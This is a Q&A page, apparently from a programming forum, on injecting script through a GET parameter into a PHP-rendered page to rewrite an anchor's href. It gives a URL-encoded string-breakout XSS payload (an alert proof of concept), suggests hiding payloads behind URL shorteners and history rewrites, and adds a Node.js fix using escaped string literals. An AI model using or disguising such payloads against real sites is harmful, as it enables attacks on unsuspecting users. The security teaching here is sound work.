Tags: html, csrf, xss, burp

How can I change the contents of an anchor tag with the aim of performing a CSRF attack?


I am new at bug bounty programs and I think I have found a vulnerability in one of the sites that I am working on. My concern is that I still do not know how to change the content of an anchor tag to reflect on the website permanently. Any feedback is highly appreciated.


Solution

  • I should note that, from a purely front-end perspective it is not possible to make permanent changes to a web page. However, you can leverage URL shorteners like TinyURL or Bit.ly to mask your injection; you can also use history rewrites to hide your injection payloads from targets.

    From a Front-End JavaScript perspective, it's pretty simple. Using our injection point as the attack vector, we need to override the front-end element's href or onclick attributes.

    Simple example of overriding onclick and href attributes on an anchor tag within StackOverflow:

    <a id="arbitraryId" href="https://google.com" target="_BLANK">Click Me</a>
    <script>
      // The anchor must already exist in the DOM when the selector runs,
      // so the script is placed after it.
      const t = document.querySelector("#arbitraryId");
      t.href = "javascript:alert(0);";
    </script>

    Using the above snippet example, we can urlencode the payload and add it to our attack vector (a GET parameter) which would look like this;

    https://some.where/?arbitraryAttackVector=%27%3Bconst%20t%20%3D%20document.querySelector%28%27%23arbitraryId%27%29%3Bt.href%3D%27javascript%3Aalert%280%29%3B%20%2F%2F%20comment
    

    Decodes as:

    https://some.where/?arbitraryAttackVector=';const t = document.querySelector('#arbitraryId');t.href='javascript:alert(0); // comment
    

    Note: This is for injecting into an element whose underlying code looks like this;

    <?php
    
    $injectionPayload = $_GET['arbitraryAttackVector']; // Vulnerable portion in SSR.
    
    echo <<<EOF
    <a id="arbitraryId" href="https://google.com">Click Here</a>
    <ul id="listId"></ul>
    
    <script>
      const list = document.querySelector('#listId');
      const el = document.createElement('li');
      el.innerText = '{$injectionPayload}'; <!-- Vulnerable portion injected into arbitrary string in SSR. -->
      list.appendChild(el);
    </script>
    EOF;
    
    

    And this is how the page would be rendered via SSR;

    <a id="arbitraryId" href="https://google.com">Click Here</a>
    <ul id="listId"></ul>
    
    <script>
        const list = document.querySelector('#listId');
        const el = document.createElement('li');
        el.innerText = '';const t = document.querySelector('#arbitraryId');t.href='javascript:alert(0); // comment'; <!-- Vulnerable portion injected into arbitrary string in SSR. -->
        list.appendChild(el);
    </script>
    

    Zooming in on just the script portion;

    const list = document.querySelector('#listId');
    const el = document.createElement('li');
    el.innerText = '';const t = document.querySelector('#arbitraryId');t.href='javascript:alert(0); // comment'; <!-- Vulnerable portion injected into arbitrary string in SSR. -->
    list.appendChild(el);
    

    You can read more on XSS here: https://xss.js.org/
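As an added example that is not part of the original answer, the vulnerable template above is re-created in Node.js beside a hardened version that serialises the untrusted parameter as a JSON string literal before placing it inside the script. A small stub DOM lets both rendered scripts execute offline so the difference is observable rather than argued. The function names, the stub document and the sample payload are my own assumptions; the payload is the decoded value from the answer's URL.

```javascript
// Added example (mine, not code from the answer above): the vulnerable
// server-side template re-created in Node.js next to a hardened version,
// plus a stub DOM so both rendered scripts can be run and compared offline.
// Function names, the stub document and the sample payload are assumptions.

// Constructed sample input: the decoded payload from the answer's URL.
const SAMPLE_PAYLOAD =
  "';const t = document.querySelector('#arbitraryId');t.href='javascript:alert(0); // comment";

function pageTemplate(innerTextExpr) {
  // Shared markup; only the right-hand side of the innerText assignment differs.
  return `<a id="arbitraryId" href="https://google.com">Click Here</a>
<ul id="listId"></ul>
<script>
  const list = document.querySelector('#listId');
  const el = document.createElement('li');
  el.innerText = ${innerTextExpr};
  list.appendChild(el);
</script>`;
}

// Vulnerable: the raw GET parameter is spliced into a single-quoted JS string,
// exactly like `el.innerText = '{$injectionPayload}';` in the PHP above.
function renderVulnerable(param) {
  return pageTemplate(`'${param}'`);
}

// Hardened: serialise the value as a JSON string literal (quotes and
// backslashes escaped), then also escape <, >, & and the U+2028/U+2029 line
// terminators so the literal can neither leave the string nor close <script>.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderHardened(param) {
  return pageTemplate(jsStringLiteral(param));
}

// Minimal stand-in for the browser DOM: just enough for the two scripts to run.
function makeStubDocument() {
  const anchor = { id: "arbitraryId", href: "https://google.com" };
  const list = {
    id: "listId",
    children: [],
    appendChild(child) { this.children.push(child); },
  };
  return {
    anchor,
    list,
    querySelector(selector) {
      if (selector === "#arbitraryId") return anchor;
      if (selector === "#listId") return list;
      return null;
    },
    createElement(tag) {
      return { tag, innerText: "" };
    },
  };
}

// Extract the first <script> body and execute it against the stub document.
// Returns what an injected payload could have changed: the anchor's href and
// the text of every <li> the script appended.
function runRendered(html) {
  const match = html.match(/<script>([\s\S]*?)<\/script>/);
  const body = match ? match[1] : "";
  const doc = makeStubDocument();
  new Function("document", body)(doc);
  return {
    anchorHref: doc.anchor.href,
    listItems: doc.list.children.map((child) => child.innerText),
  };
}

console.log("vulnerable:", runRendered(renderVulnerable(SAMPLE_PAYLOAD)));
console.log("hardened:  ", runRendered(renderHardened(SAMPLE_PAYLOAD)));
```

Running it shows the vulnerable page ending up with the anchor's href rewritten and an empty list item, while the hardened page keeps the original href and stores the whole payload as harmless text. The PHP equivalent of `jsStringLiteral` is `json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT)`; a Content-Security-Policy without `unsafe-inline` is a useful second layer, but the encoding fix is what removes the bug.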